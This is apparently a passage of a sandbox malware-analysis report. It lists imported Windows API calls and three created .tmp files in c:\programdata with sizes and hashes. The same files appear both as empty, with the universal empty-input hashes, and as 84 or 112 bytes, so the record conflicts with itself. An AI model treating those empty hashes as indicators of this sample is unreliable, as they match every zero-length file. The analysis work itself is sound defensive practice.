GetConsoleDisplayMode 0x0 0x404028 0x42b8 0x42b8
GetConsoleFontSize 0x0 0x40402c 0x42bc 0x42bc
RaiseException 0x0 0x404030 0x42c0 0x42c0
HeapAlloc 0x0 0x404034 0x42c4 0x42c4
GetCurrentProcess 0x0 0x404038 0x42c8 0x42c8
lstrlenA 0x0 0x40403c 0x42cc 0x42cc
LocalAlloc 0x0 0x404040 0x42d0 0x42d0
LocalFree 0x0 0x404044 0x42d4 0x42d4
GetProcAddress 0x0 0x404048 0x42d8 0x42d8
FreeLibrary 0x0 0x40404c 0x42dc 0x42dc
c:\programdata\9f1b.tmp, ...
-
File Properties
Names c:\programdata\9f1b.tmp (Created File)
c:\programdata\9f1c.tmp (Created File)
c:\programdata\9f2d.tmp (Created File)
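Size 0.00 KB (0 bytes) (the hash values below are those of zero-length input; they match every empty file and are not usable as indicators for this sample)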
Hash Values MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
c:\programdata\9f1c.tmp
-
File Properties
Names c:\programdata\9f1c.tmp (Created File)
Size 0.11 KB (112 bytes)
Hash Values MD5: 36427ecb2a0faf13af3047c51b29f9c5
SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f
SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345
Actions
c:\programdata\9f1b.tmp
-
File Properties
Names c:\programdata\9f1b.tmp (Created File)
Size 0.08 KB (84 bytes)
Hash Values MD5: fdf031de948302c61dede50cd61fa096
SHA1: d926af57565c1448dd81009ed90e324575e9b481
SHA256: 370497cb330134ed7954bbedd18db1a0b34a85bc821b857624183a8d139b95d5
Actions